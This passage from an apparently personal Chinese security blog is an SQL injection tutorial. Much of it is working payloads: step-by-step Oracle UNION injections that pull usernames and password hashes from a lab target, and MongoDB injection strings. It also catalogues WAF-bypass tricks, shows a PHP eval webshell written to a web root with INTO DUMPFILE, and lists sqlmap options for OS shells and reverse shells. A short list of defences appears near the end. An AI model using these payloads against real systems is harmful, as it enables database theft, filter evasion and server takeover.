<p><strong>into outfile</strong> 写文件函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">文件名必须全路径（绝对路径）</span><br><span class="line"></span><br><span class="line">用户必须有secure_file_priv&#x3D;文件权限</span><br><span class="line"></span><br><span class="line">没有对 ‘ 单引号过滤</span><br><span class="line"></span><br><span class="line">能够使用union查询（sql注入时）</span><br><span class="line"></span><br><span class="line">对web目录有写权限</span><br></pre></td></tr></table></figure>

<p>查询secure_file_priv的值</p>
<h3 id="oracle注入"><a href="#oracle注入" class="headerlink" title="oracle注入"></a>oracle注入</h3><p>orical数据库sql注入第一步：确定注入点</p>
<p><img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>这个位置点进去，刚好发现url<img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"> 然后 and 1=2 试试看<img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>第二步：确定数据库类型</p>
<p>排除法：使用orcale 特有的语句：select count(*) from dual</p>
<p>只能查出来一条语句，所以：(select count(*) from dual)=1</p>
<p>如果成立，则存在注入点：<img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>第三步：确定字段数（order by）</p>
<p>使用order by来确定字段数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 order by 2</span><br></pre></td></tr></table></figure>

<p>如果正确则返回正常，如果不正确则返回错误</p>
<p>第四步：确定参数类型</p>
<p>使用联合查询来确定类型(需先确定字段数)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 union select &#39;1&#39;,&#39;2&#39; from dual</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 union select &#39;1&#39;,&#39;2&#39; from dual</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>返回正常，则可以确定是字符串类型</p>
<p>第五步：获取数据库名称</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 union select (SELECT instance_name FROM V$INSTANCE),&#39;2&#39; from dual</span><br></pre></td></tr></table></figure>

<p><img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>第六步：获取表名</p>
<p>因为一次只能显示一条数据，所以需要加上：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">where rownum&#x3D;1</span><br><span class="line"></span><br><span class="line">SELECT table_name FROM all_tables</span><br></pre></td></tr></table></figure>

<p>显示出来的明显跟我们需要的不符，所以再加上个条件语句：table_name like ‘%user%’</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 union select (SELECT table_name FROM all_tables where rownum&#x3D;1 and  table_name like &#39;%user%&#39;),&#39;xxxx&#39; from dual</span><br></pre></td></tr></table></figure>



<p>第七步：确定列名</p>
<p>因为一次只能显示一条数据，所以需要加上：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">where rownum&#x3D;1</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT column_name FROM all_tab_columns WHERE table_name &#x3D; &#39;sns_users&#39; and rownum&#x3D;1</span><br></pre></td></tr></table></figure>

<p>这是查询一条，可以直接合并一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.153.49.228:41164&#x2F;new_list.php?id&#x3D;1 union select (SELECT column_name FROM all_tab_columns WHERE table_name &#x3D; &#39;sns_users&#39; and rownum&#x3D;1),(SELECT column_name FROM all_tab_columns WHERE table_name &#x3D; &#39;sns_users&#39; and rownum&#x3D;1 and column_name &lt;&gt; &#39;USER_NAME&#39;) from dual</span><br></pre></td></tr></table></figure>

<p><img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>第八步：确定内容</p>
<p>双引号：关键字，对象名、字段名加双引号，则示意 Oracle将严格区 分大小写，否则Oracl都默认大写。</p>
<p>因为orcale数据库区分单引号，所以查询语句应该是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UNION SELECT USER_NAME,USER_PWD from &quot;sns_users&quot;</span><br></pre></td></tr></table></figure>

<p><img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>登录一下试试看：<img src="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif" alt="img"></p>
<p>好的，md5无法解密，试试看还有没有其他的表</p>
<p>加个条件判断</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT USER_NAME,USER_PWD from &quot;sns_users&quot; where USER_NAME &lt;&gt; &#39;hu&#39;</span><br></pre></td></tr></table></figure>





<h3 id="mongodb注入"><a href="#mongodb注入" class="headerlink" title="mongodb注入"></a>mongodb注入</h3><p>execute函数就行sql语句查询</p>
<p>获取回显数字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;&#125;); return (&#123;title:1,content:&#39;2</span><br></pre></td></tr></table></figure>

<p>设置title和content的值，因为从下面的代码可以获得，这两个字段为数据库返回的字段</p>
<p>爆出数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;&#125;); return (&#123;title:tojson(db),content:&#39;2</span><br></pre></td></tr></table></figure>

<p>tojson函数是为了将db查到的内容转化为json格式</p>
<p>爆出表名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;&#125;); return (&#123;title:tojson(db.getCollectionNames()),content:&#39;2</span><br></pre></td></tr></table></figure>

<p>爆出列名和数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;&#125;); return (&#123;title:tojson(db.Authority_confidential.find()[0]),content:&#39;1</span><br></pre></td></tr></table></figure>

<p>find()函数为查询函数，为空时默认查出所有的数据，[0]表示第一条数据<br>第二条数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;&#125;); return (&#123;title:tojson(db.Authority_confidential.find()[1]),content:&#39;1</span><br></pre></td></tr></table></figure>

<h2 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h2><h3 id="常见绕过"><a href="#常见绕过" class="headerlink" title="常见绕过"></a>常见绕过</h3><p>{注释符绕过，内联注释绕过，大小写绕过，双写绕过，关键字替换，逗号过滤，比较符号过滤，逻辑符号过滤，更改提交方法，空格绕过，等价函数绕过，http参数污染，缓冲区溢出绕过，一些函数的绕过}</p>
<h6 id="注释符绕过"><a href="#注释符绕过" class="headerlink" title="注释符绕过"></a>注释符绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line">-- (有空格)或--+</span><br><span class="line">&#x2F;**&#x2F; 块注释</span><br></pre></td></tr></table></figure>

<h6 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;*！...*&#x2F;</span><br><span class="line"></span><br><span class="line">?id&#x3D;1&#x2F;*union*&#x2F;union&#x2F;*select*&#x2F;select+1,2,3&#x2F;*</span><br><span class="line">?page_id&#x3D;-15 &#x2F;*!UNION*&#x2F; &#x2F;*!SELECT*&#x2F; 1,2,3,4….</span><br><span class="line"></span><br><span class="line">内联注释中的数字小于等于版本号时，sql语句可以被执行，反之则不可以。</span><br></pre></td></tr></table></figure>

<h6 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select -&gt; Select</span><br></pre></td></tr></table></figure>

<h6 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select -&gt; seselectlect</span><br></pre></td></tr></table></figure>

<h6 id="关键字替换"><a href="#关键字替换" class="headerlink" title="关键字替换"></a>关键字替换</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">有些waf或应用或拦截到”admin”等关键字，这时便可以利用“Àdmin”来实现绕过。</span><br><span class="line">&#x2F;?id&#x3D;1+un&#x2F;**&#x2F;ion+sel&#x2F;**&#x2F;ect+1,2,3–不影响结果</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h6 id="绕过逗号被过滤"><a href="#绕过逗号被过滤" class="headerlink" title="绕过逗号被过滤"></a>绕过逗号被过滤</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">substr、mid()函数中可以利用from to来摆脱对逗号的利用；</span><br><span class="line"></span><br><span class="line">limit中可以利用offset来摆脱对逗号的利用</span><br></pre></td></tr></table></figure>

<h6 id="比较符号被过滤"><a href="#比较符号被过滤" class="headerlink" title="比较符号被过滤"></a>比较符号被过滤</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">greatest、between and</span><br><span class="line">包括 !&#x3D; 不等于，&lt;&gt;不等于，&lt; 小于，&gt;大于，这些都可以用来替换&#x3D;来绕过</span><br></pre></td></tr></table></figure>

<h6 id="逻辑符号绕过"><a href="#逻辑符号绕过" class="headerlink" title="逻辑符号绕过"></a>逻辑符号绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and&#x3D;&amp;&amp;   or&#x3D;||     xor&#x3D;|     not&#x3D;!</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?uid<span class="operator">=</span>strcmp(<span class="keyword">left</span>((<span class="keyword">select</span><span class="operator">+</span>hash<span class="operator">+</span><span class="keyword">from</span><span class="operator">+</span>users<span class="operator">+</span>limit<span class="operator">+</span><span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>),<span class="number">0x42</span>)<span class="operator">+</span><span class="number">123</span></span><br></pre></td></tr></table></figure>

<p>123的时候页面是正确的，我们现在在盲猜hash的第一位，如果第一位等于0x42也就是B，那么strcmp结果为0，0+123=123，所以页面应该是正确的。否则就说明不是B，就这样猜，不用and 和or了</p>
<h6 id="更改提交方式"><a href="#更改提交方式" class="headerlink" title="更改提交方式"></a>更改提交方式</h6><p>将get方式改为post有可能会绕过，或者反过来。</p>
<h6 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用括号，+号，内联注释&#x2F;**&#x2F;</span><br></pre></td></tr></table></figure>

<h6 id="等价函数绕过"><a href="#等价函数绕过" class="headerlink" title="等价函数绕过"></a>等价函数绕过</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin()&#x3D;ascii()</span><br><span class="line">concat_ws()&#x3D;group_concat()</span><br><span class="line">mid()、substr()&#x3D;substring()</span><br></pre></td></tr></table></figure>

<h6 id="http参数污染"><a href="#http参数污染" class="headerlink" title="http参数污染"></a>http参数污染</h6><p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.18.21&#x2F;sqli-labs-master&#x2F;Less-29&#x2F;login.php?id&#x3D;1发现输出结果为id&#x3D;1的值</span><br><span class="line">http:&#x2F;&#x2F;192.168.18.21&#x2F;sqli-labs-master&#x2F;Less-29&#x2F;login.php?id&#x3D;1&amp;id&#x3D;2</span><br><span class="line">发现输出结果为id&#x3D;2的值发现mysql中用&amp;连接多个参数，只输出最后一个参数的结果。http:&#x2F;&#x2F;192.168.18.21&#x2F;sqli-labs-master&#x2F;Less-29&#x2F;login.php?id&#x3D;1&#39;&amp;id&#x3D;2&amp;id&#x3D;3</span><br><span class="line">页面显示注入被拦截。</span><br><span class="line">http:&#x2F;&#x2F;192.168.18.21&#x2F;sqli-labs-master&#x2F;Less-29&#x2F;login.php?id&#x3D;1&amp;id&#x3D;2&amp;id&#x3D;3&#39;</span><br><span class="line">页面显示数据库错误</span><br></pre></td></tr></table></figure>

<p>说明第一个参数被waf拦截，中间的参数无影响，最后一个参数被带到数据库中执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1 union select+1,2,3+from+users+where+id&#x3D;1–-变为id&#x3D;1 union select+1&amp;id&#x3D;2,3+from+users+where+id&#x3D;1–-</span><br></pre></td></tr></table></figure>

<h6 id="缓冲区溢出绕过"><a href="#缓冲区溢出绕过" class="headerlink" title="缓冲区溢出绕过"></a>缓冲区溢出绕过</h6><p>例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span>)<span class="operator">=</span>(<span class="keyword">Select</span> <span class="number">0xAAAAAAAAAAAAAAAAAAAAA</span>)<span class="operator">+</span><span class="keyword">UnIoN</span><span class="operator">+</span><span class="keyword">SeLeCT</span><span class="operator">+</span><span class="number">1</span>,<span class="number">2</span>,version(),<span class="number">4</span>,<span class="number">5</span>,database(),<span class="keyword">user</span>(),<span class="number">8</span>,<span class="number">9</span>,<span class="number">10</span>,<span class="number">11</span>,<span class="number">12</span>,<span class="number">13</span>,<span class="number">14</span>,<span class="number">15</span>,<span class="number">16</span>,<span class="number">17</span>,<span class="number">18</span>,<span class="number">19</span>,<span class="number">20</span>,<span class="number">21</span>,<span class="number">22</span>,<span class="number">23</span>,<span class="number">24</span>,<span class="number">25</span>,<span class="number">26</span>,<span class="number">27</span>,<span class="number">28</span>,<span class="number">29</span>,<span class="number">30</span>,<span class="number">31</span>,<span class="number">32</span>,<span class="number">33</span>,<span class="number">34</span>,<span class="number">35</span>,<span class="number">36</span>–<span class="operator">+</span></span><br></pre></td></tr></table></figure>

<p>其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好</p>
<h6 id="一些函数的绕过"><a href="#一些函数的绕过" class="headerlink" title="一些函数的绕过"></a>一些函数的绕过</h6><p><strong>addslashes</strong></p>
<p>会在指定的预定义字符前添加反斜杠转义，这些预定义的字符是：单引号（’）、双引号（”）、反斜线（）与 NUL（NULL 字符）。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">将字符串转为16进制编码数据或使用char函数（十进制）进行转化（因为数据库会自动把16进制转化）用注释符去掉输入密码部分如“– &#x2F;* #”</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload&#x3D;http:&#x2F;&#x2F;localhost&#x2F;injection&#x2F;user.php?username&#x3D;CHAR(97,100, 109, 105, 110, 35)</span><br></pre></td></tr></table></figure>

<p><strong>escape( )</strong></p>
<p>对ASCII字母、数字、标点符号”@* _ + – . /“不进行编码。在u0000到u00ff之间的符号被转成%xx的形式，其余符号被转成%uxxxx的形式。（注意escape()不对”+”编码，而平时表单中的空格会变成+）</p>
<p><strong>encodeURL</strong></p>
<p>对” ;  / ? : @ &amp; = + $ , # ‘ “不进行编码。编码后，它输出符号的utf-8形式，并且在每个字节前加上%。</p>
<p><strong>encodeURIComponent</strong></p>
<p>用于对URL的组成部分进行个别编码，而不用于对整个URL进行编码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@ * _ + - .&#x2F; ;   ? : @ &amp; &#x3D; + $ , # &#39; 空格</span><br></pre></td></tr></table></figure>





<h2 id="关于sql注入的面试题"><a href="#关于sql注入的面试题" class="headerlink" title="关于sql注入的面试题"></a>关于sql注入的面试题</h2><p>1.mysql注入点，用工具对目标站直接写入一句话。需要root权限，以及网站的绝对路径</p>
<p>2.注入时字符被转义：宽字符注入，hex编码绕过。</p>
<p>3.安全狗是根据特征码发现一句话木马，很好绕过。</p>
<p>4.access扫出后缀asp的数据库问价你，访问乱码，迅雷下载，改为.mdb后缀。</p>
<p>5.注入时可以不使用and 或or 或xor，直接order by 开始注入吗？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and&#x2F;or&#x2F;xor，前面的1&#x3D;1、1&#x3D;2步骤只是为了判断是否为注入点，如果已经确定是注入点那就可以省那步骤去。</span><br></pre></td></tr></table></figure>

<p>6.某个防注入系统，在注入时会提示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">系统检测到你有非法注入的行为。已记录您的ip xx.xx.xx.xx时间:2016:01-23提交页面:test.asp?id&#x3D;15提交内容:and 1&#x3D;1</span><br></pre></td></tr></table></figure>

<p>如何利用这个防注入系统拿shell？</p>
<p>在URL里面直接提交一句话，这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接。</p>
<p>7.sql注入有以下两个测试选项，选一个并且阐述不选另一个的理由：</p>
<p>A. demo.jsp?id=2+1 B. demo.jsp?id=2-1<br>选B，在 URL 编码中 + 代表空格，可能会造成混淆</p>
<p>8.以下链接存在 sql 注入漏洞，对于这个变形注入，你有什么思路？</p>
<p>demo.do?DATA=AjAxNg==<br>DATA有可能经过了 base64 编码再传入服务器，所以我们也要对参数进行 base64 编码才能正确完成测试</p>
<p>9.发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell，哪种是优选？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.有写入权限的，构造联合查询语句使用 INTO OUTFILE，可以将查询的输出重定向到系统的文件中，这样去写入 WebShell2.使用 sqlmap –os-shell 原理和上面一种相同，来直接获得一个 Shell，这样效率更高3.通过构造联合查询语句得到网站管理员的账户和密码，然后扫后台登录后台，再在后台通过改包上传等方法上传 Shell</span><br></pre></td></tr></table></figure>

<p>10.sqlmap，怎么对一个注入点注入？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如果是get型号，直接，sqlmap -u &quot;诸如点网址&quot;.如果是post型诸如点，可以sqlmap -u &quot;注入点网址” --data&#x3D;&quot;post的参数&quot;如果是cookie，X-Forwarded-For等，可以访问的时候，用burpsuite抓包，注入处用号替换，放到文件里，然后sqlmap -r &quot;文件地址&quot;</span><br></pre></td></tr></table></figure>

<p>11.延时注入如何来判断？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(ascii(substr(“hello”, 1, 1))&#x3D;104, sleep(5), 1)</span><br></pre></td></tr></table></figure>

<p>12.盲注和延时注入的共同点？<br> 都是一个字符一个字符的判断</p>
<p>13.sql注入写文件都有哪些函数？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#39;一句话&#39; into outfile &#39;路径&#39;select &#39;一句话&#39; into dumpfile &#39;路径&#39;select &#39;&lt;?php eval($_POST[1]) ?&gt;&#39; into dumpfile &#39;d:\wwwroot\baidu.com\nvhack.php&#39;;</span><br></pre></td></tr></table></figure>

<p>14.SQL注入防护方法？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1、使用安全的API 2、对输入的特殊字符进行Escape转义处理 3、使用白名单来规范化输入验证方法 4、对客户端输入进行控制，不允许输入SQL注入相关的特殊字符 5、服务器端在提交数据库进行SQL查询之前，对特殊字符进行过滤、转义、替换、删除。</span><br></pre></td></tr></table></figure>

<h2 id="sqlmap的使用"><a href="#sqlmap的使用" class="headerlink" title="sqlmap的使用"></a>sqlmap的使用</h2><p>random随机给一个请求头，delay多少秒尝试一次，也可以使用–safe-freq（后面跟一个数字，代表每隔几次访问一次正常链接）和thread（线程），technique可选择注入类型，dbms选择数据库，如果有防火墙可以跟上 –tamper。后面添加了星号 * ，表示a参数为待测试参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:&#x2F;&#x2F;xxx.xxx.xx.xx&#x2F;xx.php?id&#x3D;xx --random-agent --delay 3 --thread&#x3D;3 --technique&#x3D;B --dbms&#x3D;mysql</span><br></pre></td></tr></table></figure>

<p>sqlmap的一些常用参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">-u #注入点</span><br><span class="line">-f #指纹判别数据库类型</span><br><span class="line">-r 指定一个数据包</span><br><span class="line"> -b #获取数据库版本信息</span><br><span class="line"> -p #指定可测试的参数(?page&#x3D;1&amp;id&#x3D;2 -p “page,id”)</span><br><span class="line"> -D “” #指定数据库名</span><br><span class="line"> -T “” #指定表名</span><br><span class="line"> -C “” #指定字段</span><br><span class="line"> --columns #列出字段</span><br><span class="line"> --current-user #获取当前用户名称</span><br><span class="line"> --current-db #获取当前数据库名称</span><br><span class="line"> --users #列数据库所有用户</span><br><span class="line"> --passwords #数据库用户所有密码</span><br><span class="line"> --privileges #查看用户权限(–privileges -U root)</span><br><span class="line"> --dbs #列出所有数据库</span><br><span class="line"> --tables -D “” #列出指定数据库中的表</span><br><span class="line"> --columns -T “user” -D “mysql” #列出mysql数据库中的user表的所有字段</span><br><span class="line"> –-dump -T “” -D “” -C “” #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)</span><br><span class="line"> --dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)</span><br><span class="line"> --os #指定系统(Linux,Windows)</span><br><span class="line"> --sql -shell  写shell</span><br><span class="line"> --delay 延迟的时间</span><br><span class="line">--level&#x3D;3 注入等级</span><br><span class="line">--safe-freq 次数</span><br><span class="line"> --privileges #查看权限</span><br><span class="line"> --is-dba #是否是数据库管理员</span><br><span class="line"> --cookie “用;号分开” #cookie注入(–cookies&#x3D;”PHPSESSID&#x3D;mvijocbglq6pi463rlgk1e4v52; security&#x3D;low”)</span><br><span class="line"> --referer “” #使用referer欺骗(–referer “http:&#x2F;&#x2F;www.baidu.com”)</span><br><span class="line"> --user-agent “” #自定义user-agent</span><br><span class="line"> --proxy “http:&#x2F;&#x2F;xxxx:8118″ #代理注入</span><br><span class="line"> --threads 　　 #采用多线程(–threads 3)</span><br><span class="line"> --sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user &#x3D; ‘root’ LIMIT 0, 1″ )</span><br><span class="line"> --file-write #写入本地文件(–file-write &#x2F;test&#x2F;test.txt –file-dest &#x2F;var&#x2F;www&#x2F;html&#x2F;1.txt;将本地的test.txt文件写入到目标的1.txt)</span><br><span class="line"> –os-shell #系统交互shell</span><br><span class="line"> –os-pwn #反弹shell(–os-pwn –msf-path&#x3D;&#x2F;opt&#x2F;framework&#x2F;msf3&#x2F;)</span><br><span class="line"> -p “user-agent” –user-agent “xxxx” #指定user-agent注入</span><br><span class="line"> --eta #盲注</span><br><span class="line"> --batch默认选项进行注入</span><br><span class="line"> --hex解析数据</span><br><span class="line"> --hpp 使用http参数污染</span><br><span class="line"> --tamper 脚本绕过</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/23/hw%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/" rel="next" title="HW">
                <i class="fa fa-chevron-left"></i> HW
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/tx.jpeg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/HoAd-sc" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:1678421120@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
